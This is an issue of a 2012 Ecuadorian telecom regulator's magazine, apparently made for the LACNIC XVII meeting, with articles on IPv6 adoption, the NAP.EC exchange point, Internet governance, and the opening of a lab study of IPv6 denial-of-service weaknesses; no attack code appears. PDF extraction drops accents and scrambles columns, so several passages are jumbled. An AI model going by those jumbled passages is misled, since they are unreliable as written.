Supertel14 2012

REVISTA INSTITUCIONAL
N14 IPv6 en Ecuador La sociedad de la informacin en el Ecuador Desarrollo de aplicaciones mviles crece aceleradamente en Ecuador
Un producto de:
EDICIN N 14 | 1
CONSEJO EDITORIAL
Fabin Jaramillo Palacios Superintendente de Telecomunicaciones Claudio Rosas Castro Intendente Nacional de Control Tcnico Luis Holgun Ochoa Intendente Nacional de Gestin Oswaldo Ramn Moncayo Procurador General Efran Andrade Vallejo Director Nacional Financiero Administrativo Patricio Jarrn Noboa Director Nacional de Imagen y Comunicacin
CONTENIDO
04 06 14 18 22 26 46 48
MENSAJE DEL COMIT ORGANIZADOR
IPV6 EN ECUADOR
PUNTOSDEINTERCAMBIO DE TRFICO EN EL ECUADOR, NAP.EC
ECUADOR EN LA GOBERNANZADEINTERNET
Redaccin: Fabin Meja, Francisco Balarezo, Carlos Vera, CLARO, Ral Echeberra y Julio Csar Hidalgo El contenido de los artculos es de exclusiva responsabilidad de sus autores Coordinacin Mario Jarrn Fotografas Byron Canga Banco fotogrfico Shutterstock Diseo, correccin de textos e impresin
LA SOCIEDAD DE LA INFORMACIN EN EL ECUADOR
SEGURIDAD EN IP VERSION 6.
DESARROLLO DE APLICACIONES MVILES CRECEACELERADAMENTE EN ECUADOR
EL CONTEXTO DE LA CIBERSEGURIDAD
A CTUA LIDAD
Mensaje del Comit Organizador

Gobernanza de Internet. Un ao de organizacin, que inici con la presentacin de la candidatura de nuestro pas, efectuada en Cancn en la reunin de LACNIC XV en mayo del 2011, que continu con la decisin del Directorio para otorgarnos la sede de este XVII encuentro de la comunidad tcnica, cientfica, poltica, empresarial y social de Internet de nuestra regin y que hoy culmina al tenerlos a todos ustedes participando con nosotros, ha valido la pena. Hoy es tiempo de cosechar los frutos de haber trabajado coordinada y sistematizadamente para estar a la altura del reto y brindarles, adems de nuestra tradicional hospitalidad y calidez, la calidad de un evento que esperamos ser bien apreciado y recibido por nuestros ilustres visitantes. Mi agradecimiento a todos los que hicieron posible que tengamos en Ecuador este evento especializado y esta concurrencia tan importante: A los miembros del Comit local e internacional, a la comunidad de actores tcnicos, polticos, acadmicos, empresariales y sociales de n mi calidad de Superintendente de Telecomunicaciones del Ecuador, en representacin del Comit Organizador local de esta reunin de LACNIC XVII, les doy la Internet del pas que apoyaron esta iniciativa, a la ciudad por acogernos y a todos ustedes por haber respondido a nuestra convocatoria. Que el mayor evento de Internet de la regin, sea la oportunidad para que nuestro pas refuerce su presencia en el mbito de la Gobernanza de Internet y que ustedes, queridos amigos que participan de este encuentro, disfruten de la reunin de LACNIC XVII, de nuestro pas, de su gente, naturaleza, hospitalidad, cultura, arte y gastronoma. En Quito, ahora somos el centro del mundo de Internet del 6 al 11 de mayo de 2012. Bienvenidos todos!
bienvenida a nuestro pas. Ecuador hoy no es solamente privilegiado por estar ubicado en la mitad del mundo; en esta oportunidad, la presencia de ms de 400 delegados nacionales e internacionales nos convirte en el centro del mundo de Internet, del cual LACNIC es el evento ms importante, integrando a gobiernos, empresas y sociedad civil de la regin de Latinoamrica y El Caribe, con repercusin mundial, porque la temtica que aqu trataremos y discutiremos, las polticas que se promuevan y los acuerdos que se alcancen repercutirn en el entorno internacional de la
Fabin Jaramillo Palacios Superintendente de Telecomunicaciones del Ecuador Presidente del Comit Organizador local de LACNIC XVII
4 | REVISTA INSTITUCIONAL SUPERTEL
EDICIN N 14 | 5
A CTUA LIDAD
Ecuador
Ing. Fabin Meja ADMINISTRADOR NEP .EC AEPROVI
IPv6 en
EDICIN N 14 | 7
A CTUA LIDAD
ntre otros varios identificadores nicos que se manejan en Internet tenemos el identificador del protocolo Internet (IP, Internet Protocol) conocido como direccin IP. Estas direcciones permiten identificar unvocamente cualquier interfaz dentro de una red que utiliza IP, como es el caso de Internet. Estos identificadores son nmeros binarios con un nmero limitado de bits, 32 en el caso de las direcciones IPv4, es decir, ms de 4200 millones de direcciones posibles, pero si descontamos algunos rangos reservados para usos especiales, la cantidad de direcciones realmen-
te utilizable se reduce a alrededor de 3700 millones de direcciones IPv4. Esa cantidad de direcciones pareci ser suficiente en los albores del Internet donde la cantidad de redes y computadores interconectados era relativamente poca, pero el vertiginoso crecimiento de la penetracin mundial de Internet (hoy con una poblacin de ms de 7000 millones de personas) y el surgimiento del Internet de las cosas, han hecho que esa cantidad quede corta. Por su gran impacto el negocio de proveer acceso a Internet ha crecido solo, pero actualmente
incluso se ve impulsado por los gobiernos. Estudios econmicos demuestran que un incremento del 10% en la penetracin del acceso a Internet genera un crecimiento del 1% en el PIB y por otra parte el acceso a Internet es considerado como un instrumento habilitante de derechos humanos fundamentales como la libertad de expresin, de ah que el plan de gobierno de muchos pases considera alguna medida para lograr la masificacin del Internet. Por otra parte, muchos dispositivos que antes funcionaban sin conexin de red requieren o requerirn de direcciones IP para aprovechar al mximo nuevas
Muchos dispositivos que antes funcionaban sin conexin de red, requieren o requerirn de direcciones IP para aprovechar al mximo nuevas funcionalidades, conformando as lo que hoy se conoce como el Internet de las cosas
funcionalidades, conformando as lo que hoy se conoce como el Internet de las cosas, es decir, dispositivos que se comunican entre s o hacia Internet para cumplir ciertas tareas sin necesidad de intervencin humana, por ejemplo: celulares actualizando aplicaciones, televisores actualizando/bajando programacin, cmaras de video y sensores de movimiento informado/ grabando la presencia de intrusos, sensores/medidores enviando informacin recolectada peridicamente, refrigeradores informando del estado de los vveres, etc.. La administracin de los recursos IP actualmente tiene una estructura jerrquica, una entidad central llamada IANA (Internet Assigned Numbers Authority) administra todo el espacio de direccionamiento disponible y es la encargada de entregar bloques de direcciones a organizaciones regionales denominadas RIRs (Regional Internet Registry) conforme a demanda, quienes a su vez se encargan de la distribucin/ asignacin a los proveedores de Internet. LACNIC es el RIR para la regin de Amrica Latina y Caribe. El espacio IPv4 disponible en IANA se agot definitivamente en febrero de 2011 y en abril del mismo ao APNIC (el RIR para la regin de Asia Pacfico) empez a asignar direcciones IPv4 desde su ltimo bloque de direcciones, esto implica algunas restricciones en la asignacin de direcciones. Para dar solucin a la necesidad creciente de direcciones, la IETF (Internet Engineering Task Force) cre IPv6 en la dcada de los 90. Esta nueva versin del protocolo usa direcciones de 128 bits, lo cual significa algo ms de 340 sextillones de direcciones disponibles. Para tener una idea de la cantidad de direcciones disponibles se puede decir que el espacio de direccionamiento disponible es suficiente para cubrir la demanda de ms de 4200 millones de proveedores de Internet con 65536 clientes cada uno. Es necesario aclarar que IPv6 tiene sus fans y sus detractores, ambos sectores tienen sus argumentos que pueden resultar vlidos dependiendo desde el punto de vista que se los mire. Por ejemplo muchas veces se pretende vender a IPv6 como un protocolo que resuelve algunos problemas encontrados en IPv4, por ejemplo seguridad, pero esto no es tan preciso y nada ms crea falsas expectativas, pues lo que se buscaba resolver con el nuevo protocolo es la escasez de direcciones IP, lo cual no quiere decir que IPv6 sea ms o menos inseguro que IPv4 o que no implique la oportunidad para mejorar algunas otras cosas. As mismo, en el otro extremo hay quienes creen que NAT a gran escala es una mejor opcin que IPv6, o que
EDICIN N 14 | 9
A CTUA LIDAD
por ejemplo, es una mala opcin para PYMEs, pues sin NAT sera (dicen ellos) necesario renumerar toda la red en caso de cambio de proveedor, pero dependiendo del tamao una asignacin PI (Provider Independent) resolvera el problema. En todo caso, a nivel personal creo que IPv6 no es perfecto, pero es lo que tenemos y su uso es la alternativa tcnica y econmicamente ms adecuada a la realidad de nuestro pas que permitir afrontar el crecimiento futuro del Internet. Como se mencion, las especificaciones bsicas del protocolo fueron establecidas hace aproximadamente 15 aos; sin embargo, su utilizacin estuvo por mucho tiempo circunscrita a unas pocas redes, en su mayora de carcter universitario o de investigacin, pero esto ha comenzado a cambiar con el advenimiento de sistemas operativos que traen IPv6 habilitado por defecto (Windows Vista, 7) y especialmente con la realizacin del IPv6 Day, el 6 de junio de 2011, un evento organizado y coordinado por la Internet Society (ISOC) a travs del cual - durante 24 horas - grandes redes y proveedores de contenido (Facebook, Yahoo, Google entre otras) habilitaron acceso por IPv6 a sus pginas principales. Para el 6 de junio de 2012, ISOC ha organizado el IPv6 Launch, los participantes de este evento dejarn habilitado IPv6 en sus redes/portales a partir de dicho da y de forma indefinida. Pero demos un vistazo al estado de la implementacin de IPv6 en Ecuador: Bloques IPv6 asignados y utilizados (al 8 de abril de 2012): 23 bloques IPv6 asignados/ distribuidos por LACNIC a organizaciones ecuatorianas 12 bloques utilizados (vistos en el Internet Global) 11 organizaciones diferentes utilizan prefijos IPv6
Oferta de servicios soporte de IPv6:
son
Pginas locales con soporte IPv6: www.aeprovi.org.ec www.ipv6tf.ec www.cedia.org.ec Pginas de algunas universidades ecuatorianas (listado en ipv6tf.ec) Como vemos, la transicin a IPv6 dentro del territorio ecuatoriano se est iniciando, por lo cual y por iniciativa de AEPROVI se cre la Fuerza de Trabajo de IPv6 de Ecuador (IPv6TF-EC) con los siguientes objetivos:
ISPs que pueden proveer trnsito IPv6 nativo: 3 ISPs que proveen servicio HOME con soporte IPv6 nativo: 0 El punto de intercambio de trfico local de Internet (NAP. EC) tiene IPv6 nativo habilitado El dominio .EC tiene un servidor con IPv6 fuera del Ecuador y otro en NAP.EC. NIC.EC acepta registros AAAA para dominios .EC (contactar a jjcollantes@ nic.ec)
Ser fuente de informacin relacionada con el Protocolo de Internet versin 6 (IPv6). Coordinar labores de capacitacin y difusin sobre IPv6. Coordinar los esfuerzos de los diferentes actores del Internet ecuatoriano para una eficaz y pronta adopcin del IPv6. Fomentar el uso de IPv6. Establecer permanente comunicacin e identificar oportunidades de colaboracin con los Grupos de Trabajo de otros pases y regiones.
EDICIN N 14 | 11
A CTUA LIDAD
Elaborar un plan de accin para la implementacin de IPv6 en el pas y propiciar su uso. El IPv6TF-EC no es una persona jurdica, es simplemente un grupo de trabajo con participacin abierta; se busca incentivar la participacin de ecuatorianas y ecuatorianos de los siguientes sectores: industria, gobierno, sector educativo, usuarios. El Grupo de Trabajo cuenta con un portal de Internet (www.ipv6tf. ec) con soporte de IPv6 nativo y alojado en Ecuador. La participacin se realiza mediante la suscripcin a la lista de correo electrnico foro@ ipv6tf.ec (la suscripcin se realiza a travs del portal). Interesados en crear contenido para el portal, comentarios y sugerencias pueden escribir a: contacto@ipv6tf.ec. El liderazgo del Task Force se ha delegado al MINTEL y sus acciones han sido posibles gracias al apoyo de AEPROVI, NIC.EC y algunos otros individuos a ttulo personal. En conclusin, IPv6 no resuelve todos los problemas de su antecesor pero es la alternativa tcnica y econmica ms adecuada a la realidad de nuestro pas para afrontar el crecimiento futuro del Internet. La transicin a IPv6 en Ecuador se est iniciando y se requiere mayor difusin y capacitacin, para esto es muy importante impulsar las actividades que podra ofrecer el IPv6TF-EC.
EDICIN N 14 | 13
A CTUA LIDAD
Puntos de intercambio de trfico en el Ecuador, NAP.EC

Ing. Francisco Balarezo, MBA DIRECTOR EJECUTIVO AEPROVI
Antecedentes La ASOCIACION DE EMPRESAS PROVEEDORAS DE
SERVICIOS DE INTERNET, VALOR AGREGADO, PORTADORES Y TECNOLOGIA DE LA INFORMACION (AEPROVI), cuya misin es: promover, proteger, masificar y desarrollar el Internet, como medio para el progreso social, econmico, poltico y cultural en el Ecuador, al iniciar su actividad, promovi la creacin de NAP Ecuador, NAP.EC (Network Access Point), con el objeto de intercambiar localmente trfico de Internet originado y terminado en el Ecuador; en la actualidad acta como un IXP (Internet Exchange Point). Oficialmente, el NAP.EC fue creado el 4 de julio de 2001
El NAP tiene cobertura .EC nacional, para lo cual AEPROVI se encarga de invertir, implementar y habilitar los nodos que sean necesarios conforme a los requerimientos de intercambio de trfico local.
con aval del CONATEL, institucin que suscribi el documento de creacin testificando y dando apoyo para que el acceso a Internet en el Ecuador se desarrolle. AEPROVI como organizacin privada sin fines de lucro, administra el NAP.EC de forma neutral, imparcial y transparente; entre sus funciones est brindar soporte tcnico y velar por el cumplimiento de los compromisos asumidos por los participantes; la relacin entre los operadores, se soporta en un Acuerdo para Intercambio de Trfico Local cuyos trminos y condiciones los participantes se comprometen a cumplir. Para participar del NAP.EC no es necesario ser socio de AEPROVI y actualmente estn conectados operadores pblicos y privados. Las estadsticas de trfico, porcentajes de ocupacin de los enlaces y participantes, est disponible en forma pblica a travs del portal www.nap.ec. El NAP .EC tiene cobertura necesarios trfico local. De acuerdo al documento de creacin, la interconexin entre nodos y la conexin directa hacia la infraestructura de Internet pueden ser suministradas como servicios adicionales si los respectivos estudios de demanda, viabilidad tcnica y econmica resultaren convenientes. Desde el 1 de diciembre de 2007, los nodos instalados en las ciudades de Quito y Guayaquil se encuentran interconectados para intercambio de trfico local a nivel nacional. El 6 de septiembre de conforme a los requerimientos de intercambio de
del dominio raz (Root F), Root L, servidor del dominio .EC y servidores cach de grandes redes de entrega de contenido (CDN) y que nos ha permitido como pas mejorar en el tiempo de acceso a los contenidos y aplicaciones, y as mismo mejorar la estructura de costos de los proveedores, estos eventos han servido para que aproximadamente un 15% del trfico hacia Internet se queda en la intranet ecuatoriana. Este despliegue realizado
por la industria a travs de la AEPROVI, tuvo un adelanto a los compromisos realizados por el pas en San Salvador en la segunda Conferencia Ministerial sobre la Sociedad de la Informacin de Amrica Latina y el Caribe, en febrero de 2008, reunin en la que se aprob el Plan de Accin sobre la Sociedad de la Informacin de Amrica Latina y el Caribe eLAC2010, que contempla 83 medidas, la nmero 14 se refiere a: Impulsar el desarrollo de la infraestructura en cada pas y en la regin, fomentando el despliegue de puntos de intercambio de trfico, la instalacin de copias de servidores raz y el alojamiento local de contenidos, con el fin de mejorar la calidad y estabilidad de la red y reducir los costos de acceso. El pas a travs de las acciones realizadas ha participado activamente y ha coadyuvado para el cumplimiento en lo pertinente del plan eLAC 2010.
2010 se habilit un nodo en la ciudad de Cuenca, el cual est interconectado con el nodo de Quito para intercambio de trfico. Apoyados en la suscripcin de varios acuerdos, dentro de las facilidades del NAP.EC se alojan infraestructuras de aplicaciones que le dan valor agregado al intercambio de trfico local, entre otros servicios, se dispone de copias de los servidores DNS
nacional, para lo cual AEPROVI se encarga de invertir, implementar y habilitar los nodos que sean
EDICIN N 14 | 15
A CTUA LIDAD
Topologa Actualmente existen 3 nodos este documento tambin se determina los parmetros de calidad para los accesos al nodo del NAP.EC. Polticas para intercambio de una trfico (peering policies) El intercambio de trfico en NAP.EC es multilateral obligatorio, es decir, cada proveedor conectado intercambia trfico con todos los dems participantes y debe anunciar todas las redes. El siguiente grfico muestra la topologa fsica de NAP.EC y los participantes actuales: enlaces El ao pasado la AEPROVI, a travs de sus funcionarios, particip como socio fundador de la asociacin civil de carcter internacional sin fines de lucro, denominada Amrica Asociacin y el para Caribe Latina espera participar en forma activa para contribuir y recibir aportes sobre las mejores prcticas del desarrollo del intercambio de trfico en la regin. Finalmente, trabajo es necesario entre los
que permiten la conexin de los proveedores de Internet al NAP.EC: Quito, Guayaquil y Cuenca. Cada nodo tiene
infraestructura de capa 2 y capa 3: los participantes comparten un medio Ethernet y a travs de esa conectividad configuran el protocolo de enrutamiento (BGP), las sesiones BGP se levantan entre un servidor de rutas del NAP.EC y el respectivo enrutador de borde de cada proveedor. Los nodos de NAP.EC estn unidos mediante interurbanos a travs de fibra ptica que transportan trfico entre es un dichas servicio ciudades (este La opcional).
resaltar que en el mbito del vinculado operadores y la Autoridad de Control, se suscribi un convenio de cooperacin entre AEPROVI y la SUPERTEL, que entre algunos objetivos, est el establecimiento de un marco de trabajo conjunto que permita implementar metodologas y procedimientos para la gestin de incidentes informticos y generar una base de conocimiento en temas de ciberseguridad y mejores prcticas para la transferencia de conocimiento, que permita generar capacidades en el talento humano y de esta manera beneficiar a los usuarios que utilizan a la red global Internet como su plataforma de acceso a las TICs.
infraestructura del NAP.EC tiene su propio nmero de sistema autnomo (ASN) y maneja su propio rango de direcciones IP pblicas. Para que un proveedor pueda participar del intercambio de trfico local a travs del NAP.EC de cumplir los siguientes requisitos mnimos: 1. Estar autorizado de para la
de Operadores de Puntos de Intercambio de Trfico (LAC-IX); como parte del Directorio se
explotacin
servicios
de Internet conforme a la legislacin ecuatoriana vigente. 2. Tener asignado un nmero de sistema autnomo pblico y direcciones IP pblicas. 3. Cumplir el Acuerdo multilateral para intercambio de trfico a travs del NAP.EC, en
EDICIN N 14 | 17
A CTUA LIDAD
en la Gobernanza de Internet
Carlos Vera Quintana Alianza Tecnolgica Ecuatoriana Comit Organizador LACNIC XVII
El caso de la participacin ecuatoriana en los espacios de Gobernanza de Internet tiene el mismo matiz que la gran mayora de participaciones de pases subdesarrollados o en vas de desarrollo.
a Gobernanza de Internet ha pasado por un proceso importante de maduracin e institucionalizacin como resultado de los altos niveles de participacin y organizacin que se han generado en las decenas de eventos e instancias, desarrolladas para asegurar que se cuente con un activo, plural y democrtico espacio en el cual convergen las distintas aristas y visiones que sobre los numerosos temas relacionados con los aspectos de gobernanza, tienen los actores del Gobierno, Empresa y Sociedad Civil. La Gobernanza exige una amplia discusin de las polticas pblicas, posiciones y acciones, que se inicia en los niveles locales y que tiende a converger
en los espacios internacionales, donde lgico los que sectores existan refuerzan notables coindicencias, aun cuando es diferencias por cuestiones polticas o de niveles de desarrollo relativo. Las coincidencias se traducen, justificaciones o mecanismos pueden esgrimirse diferentes, en al menos los siguientes aspectos: Los y Gobiernos regulan. Con controlan diversos
internacional
existen
actores
directivos que deben ser rotativos y alternativos. El caso de la participacin ecuatoriana en los espacios de Gobernanza de Internet tiene el mismo matiz que la gran mayora de participaciones Son de pases subdesarrollados o en vas de desarrollo. motivadas participaciones individuales por diversos principalmente
individuales e institucionales que han adquirido mayor protagonismo que otros en las diversas instancias de decisin. Algunos de estos actores individuales, algunos con apoyo estatal o institucional, incluso han monopolizado la presencia en dichas instancias y ostentan repetidamente por varios perodos y en diversos organismos los ms altos cargos. Esto es algo que en una Gobernanza efectiva debe cambiar. Es decir la horizontalidad de las discusiones no puede perderse en una verticalidad de las decisiones pues la Gobernanza pierde sentido. O existe demasiadas e intiles instituciones o existe muy pocos lderes en quienes confiar su conduccin. Cualquiera que sea el caso, un anlisis de las reglas de la Gobernanza debe incluir, entre las declaraciones de conflictos de inters efectivas, la pertenencia a ms de una institucin y por ms de un par de perodos en cargos
matices, argumentos polticos, culturales o religiosos, sta es una facultad estatal indelegable. Las Empresas buscan el lucro. Igualmente con matices de responsabilidad social o marcos de accin diversos. La Sociedad Civil lucha por Derechos. polticos y Con enfoques coincidencias/
intereses profesionales que al ser personales y generalmente financiadas por los mismos participantes, se dan con mayor o menor intensidad de acuerdo a las condiciones particulares de la persona. (Su situacin de trabajo, tipo de trabajo, situacin econmica, afinidad para obtener financiamiento para participar e incluso su posicin poltica en los temas que se tratan). Al no ser una participacin con sustento programtico o visin de Pas o de poltica de Estado, sufre altibajos que repercuten en una verdadera
diferencias con sus sectores empresarial y gubernamental. Por diversas razones en el entorno
EDICIN N 14 | 19
A CTUA LIDAD
presencia nacional que requiere consistencia, permanencia y sobre todo continuidad. Sin embargo de los puntos anotados, la participacin ecuatoriana en los foros y debates de Internet no ha dejado de ser importante y relevante en varios casos, y ahora con la organizacin del LACNIC XVII en Quito, se torna ms presente y de seguimiento obligado para darle continuidad a un esfuerzo de los actores nacionales que confluimos en el Comit Organizador, junto con LACNIC, para traer al Ecuador el evento ms importante de la Regin de Amrica Latina y el Caribe, con connotacin mundial. El siguiente paso es organizar una reunin de ICANN en Ecuador y mantener ms activa y coordinada presencia en los foros internacionales como condicin para involucrarnos con mayores opciones y ser actores proactivos de las decisiones que se toman. Ecuador condiciones tiene excelentes varias para
internacionales en el tema de Internet y estas incluyen: Actores conocedores del tema de excelente nivel profesional y acadmico, con experiencia de participaciones nacionales e internacionales en los temas a tratar. Un marco Constitucional desde el 2008 y legal desde el 2000 que impulsa el desarrollo de las TICs y el acceso a la informacin como un derecho ciudadano. Una institucionalidad importante que cuenta con recursos humanos, tecnolgicos y econmicos para desarrollar la Sociedad de la Informacin ecuatoriana. Un Gobierno que entiende las TICs, las impulsa y que promueve la participacin ciudadana con un modelo de poltica pblica que empieza a dar resultados. Un sector empresarial y de la Sociedad Civil con un grado de maduracin que resulta El de
importante para actuar en diversos de de niveles e de toma por su decisiones polticas que impulso
pblicas impulsen
un Internet para todos, con normas desarrollo, las libertades civiles y los derechos de acceso social equitativo e integral. esfuerzo LACNIC la del XVII, Comit
Organizador local de la reunin encabezado de por SuperIntendencia
Telecomunicaciones del Ecuador y con la activa participacin de la Corporacin Ecuatoriana de Comercio Electrnico y la Sociedad de Internet del Ecuador, y que contar con la asistencia de decenas de delegados nacionales e internacionales, es la oportunidad propicia para que Ecuador, concrete sus postulados Constitucionales e impulse la Sociedad de la Informacin con acuerdos pragmticos entre todos los actores sociales, empresariales y gubernamentales, con el fin legtimo de lograr un desarrollo social, econmico y cultural, homogneo, integral y justo.
ser actor protagnico en foros
EDICIN N 14 | 21
A CTUA LIDAD
La sociedad de la informacin en el Ecuador

Ing. Francisco Balarezo, MBA DIRECTOR EJECUTIVO AEPROVI
s necesario iniciar recordando cmo se conforma la Sociedad de la Informacin en un pas y visualizar nuestra situacin. Al estar en la era del conocimiento, siendo el individuo el capital demandante, hay que situarle en el centro y actuar para que se cumplan los derechos constitucionales de la erradicacin del analfabetismo digital, para hacer uso ptimo de las herramientas tecnolgicas y aprovechar transversalmente en las diferentes actividades humanas y empresariales. Es necesario acotar que el Plan Nacional para el Buen Vivir (2009-2013), considera que el Estado debe impulsar la investigacin y el desarrollo de las Tecnologas de la Informacin y la Comunicacin (TIC), tendientes a consolidar la transferencia de conocimientos y canalizar la innovacin hacia los sectores estratgicos de la economa. Por decreto ejecutivo nmero 8 del 13 de agosto de 2009, se crea el Ministerio de Telecomunicaciones y de la Sociedad de la Informacin; entre una de sus relevantes responsabilidades tiene que fortalecer el desarrollo de las TICS, definir polticas que permitan alcanzar el desarrollo social y econmico del Ecuador y la inclusin de sus ciudadanos en la Sociedad de la Informacin y del Conocimiento. Al disponer de las polticas pblicas y de las instituciones responsables, se hace necesario para construir la Sociedad de la Informacin en nuestro pas, considerar los aspectos que conforman y las diferentes fases para su integracin. Un especial eje es la
EDICIN N 14 | 23
A CTUA LIDAD
conectividad y se debe en forma prioritaria eliminar la mayor cantidad de barreras que limitan la masificacin del acceso de banda ancha (capacidad razonable para disponer de forma inmediata las aplicaciones que se encuentran en Internet); citamos algunas de las que generan impacto negativo y que el gobierno debera actuar inmediatas en favor de los usuarios: Asuntos regulatorios: Definicin de la nueva ley de telecomunicaciones y TICs con la participacin de los diferentes actores de la sociedad y de la industria.
Infraestructura: Comparticin, cobertura, acceso al usuario final, optimizar el uso de los recursos escasos y la mejor utilizacin de las redes de telecomunicaciones. Capacidad adquisitiva: Eliminacin del IVA para los servicios de acceso a Internet Estructura de costos: Eliminacin de aranceles para las TICs, disminucin de los costos por uso del espectro, minimizacin de tasas por uso de infraestructura esencial (especialmente por uso del espacio pblico y
por utilizacin de postes). Contenidos: Crear y albergar localmente contenidos de acuerdo a requerimientos de nuestra realidad local. Capacitacin: Erradicar el analfabetismo digital e involucrar a las TICs en los procesos educativos. Inversin: Incentivar la inversin pblica y privada. FODETEL (Fondo para el desarrollo de las telecomunicaciones marginales): Acelerar la conectividad en zonas margi-
nadas. Observando desde la ptica de la economa, la tarea es extensa si consideramos los mltiples aspectos que se deben desarrollar, en el presente anlisis solamente se citan algunos temas que hay que normar y tomar decisiones con miras a definir un calendario para la creacin de la Sociedad de la Informacin: Conectividad con carac-tersticas de acceso y servicio universal, basados en el concepto de banda ancha. Seguridad e integridad de la informacin, promover la seguridad informtica y de redes para desarrollar las Tecnologas de la Informacin y las Comunicaciones (TIC). Capacitacin en TIC y su adecuada utilizacin. Teleeducacin, telemedicina,
tralizar y modernizar el Estado a travs de la provisin de servicios electrnicos con caractersticas de dotacin universal. Comercio electrnico, generar transacciones virtuales seguras y jurdicamente habilitadas. Preservacin del patrimonio nacional a travs de medios digitales. Multilingismo lenguas nativas. Seguridad ciudadana, utilizar la tecnologa para mejorar el bienestar y el buen vivir Masificacin de la identidad de pas en los nombres de dominio (.ec) Evaluacin y veedura ciudadana sobre la implementacin de la Sociedad de la Informacin. En este orden de cosas las Tecnologas de la Informacin y las Comunicaciones deben servir al inters general y es deber del Estado promover su acceso eficiente y en igualdad de oportunidades, a todos los habitantes del territorio nacional, para que al disponer de informacin, se puede tomar decisiones y por consiguiente transformado en conocimiento podamos crear la Sociedad del Conocimiento. La transicin hacia la nueva economa digital requiere un esfuerzo importante de capacitacin de: trabajadores, empresarios y y diversidad
consumidores, as como un sector productivo basado en la ciencia y la tecnologa; es el conocimiento, incorporado en las personas, lo que constituye el principal motor de la economa basada en el conocimiento. Podemos afirmar que la Sociedad de la Informacin est centrada en trminos polticos lo que representa una aspiracin estratgica que permita el desarrollo social, por lo tanto para dinamizar la economa, hay que hacer conciencia que estamos inmersos en la informacin, globalizacin y acceso a la red. El conocimiento agrega valor a la tarea cotidiana y genera productividad y mejora la competitividad, al mismo tiempo que se toma decisiones en tiempo real. En el Ecuador tenemos casi todo por hacer y se abren grandes oportunidades de desarrollar industrias en torno a la tecnologa y con la utilizacin de sta para la sociedad, definitivamente se coadyuvara al desarrollo y crecimiento econmico del pas, es necesario que el gobierno tome agresivamente esta responsabilidad y genere un motor sostenible de crecimiento econmico para los siguientes aos, pues toda la plataforma productiva se vera beneficiada y dinamizara la economa; es hora de avanzar por nosotros mismos y por nuestra felicidad.
cultural, desarrollar contenidos en
teletrabajo; legislar y desarrollar en medios electrnicos proyectos para aprovechamiento en forma remota a travs de Internet. Ciberdelitos y proteccin para el usuario, realizar los cambios jurdicos necesarios para el juzgamiento de delitos en el espacio ciberntico. Desarrollo de software localmente en funcin de las necesidades de la sociedad. Investigacin acadmica y
transferencia tecnolgica. Gobierno electrnico, descen-
EDICIN N 14 | 25
A CTUA LIDAD
Vulnerabilidades sobre las tramas y protocolos

Investigadores: Julio Csar Hidalgo Sebastin Jaramillo
Abstracto: El documento plantea los posibles problemas de vulnerabilidades en Ipv6. Se permite realizar un ataque a dispositivos de red que tienen configurado IPv6 por defecto. Existen campos en las tramas y protocolos que nos permiten generar paquetes que necesariamente sern atendidos causando un uso alto del procesador. Se explicar el funcionamiento y ciertos conceptos bsicos de IPv6 para luego explicar unos ataques de red a dispositivos que fueron probados en el laboratorio de redes de la Supertintendencia de Telecomunicaciones. Adems de estos inconvenientes, tambin existen problemas relacionados con el poco tiempo que tiene IPv6 como tecnologa; estos problemas son: Introduccin Con la implantacin de redes basadas en el protocolo IP versin 6, el tema de seguridad no debe dejar de ser observado cuando todas las redes del mundo migren desde IP versin 4, pues ah se pueden presentar ciertas vulnerabilidades que no se consideran ahora por los adminsitradores de redes. La seguridad en IPv6 es uno de los temas ms importantes que ser tratado en este documento en donde se identificarn agujeros de seguridad que sin duda generaran riesgos en ataques que podran comprometer la informacin confidencial, la privacidad y en general el negocio de la empresa. Por ello, se har una revisin a los problemas que IPv6 tiene en la actualidad para ser implementados en la infraestructura tecnolgica de cualquier empresa. Uno de los primeros problemas en surgir en las redes IPv6 es que existen muchos mal entendidos relacionados con su funcionamiento, tales como: La seguridad fue un tpico principal en el desarrollo de Ipv6. El uso de IPSec ser ms difundido. Muchos de los ataques de IPv4 ya no podrn hacerse en IPv6. La seguridad ya no ser orientada a la red, sino al host. El protocolo IPv6 no ha sido tan probado en un ambiente real como IPv4. Existe un limitado grupo de productos de networking (switches, firewalls y routers) en el mercado que ya brinden servicios de interconectividad y seguridad IPv6. Las aplicaciones IPv6 no han sido probadas lo suficiente. Otro de los problemas es la poca experiencia y conocimiento que tienen los profesionales de las Tecnologas de la Informacin y Comunicacin (TICs) sobre el funcionamiento de los mecanismos que utiliza IPv6; y el desconocimiento de las herramientas que existen para su configuracin y mantener segura una red de este tipo. Otro inconveniente que surge es que el
Adems de estos inconvenientes, tambin existen problemas relacionados con el poco tiempo que tiene IPv6 como tecnologa.
funcionamiento de la red en general se vuelve ms complejo, debido a que para mantener la compatibilidad con aquellos servicios que utilicen IPv4 o IPv6, es necesario que las empresas utilicen los protocolos IPv4 e IPv6 al mismo tiempo (Afifi, H., 1999)1 ; entre los mecanismos que hacen que la red se vuelva ms compleja estn:
1 Methods for IPv4-IPv6 transition, Afifi, H, Computers and Communications,
1999. Proceedings. IEEE International Symposium
EDICIN N 14 | 27
A CTUA LIDAD
Mayor uso de NAT. Uso de diferentes tecnologas de transicin entre tecnologas. Mayor uso de tecnologas de tuneling. El Direccionamiento es Jerrquico: Las direcciones IP Globales (direcciones pblicas) se rigen por una jerarqua basada en la existencia de diferentes tipos de ISP, esto permitir tener tablas de enrutamiento resumidas y por lo tanto ms manejables. Autoconfiguracin de las direcciones IP: El protocolo IPv6 tiene de forma mandatoria el uso de este tipo de configuracin (Stateless Address Configuration) para que los clientes obtengan una direccin IPv6 automtica. Existe un nuevo protocolo para interactuar con los vecinos (Neighbor Discovery Protocol): Los protocolos ARP y Router Discovery son reemplazados por este nuevo protocolo que ya no utiliza broadcast para propagarse por la red, en vez de ello utiliza multicast. (Gonzlez G., 2012) 2
La cabecera de un paquete IPv6 es de 40 bytes fijo, lo cual es considerablemente ms grande que la cabecera de IPv4, esto se debe principalmente por los 32 bytes que ocupan ahora las direcciones IP origen y destino.
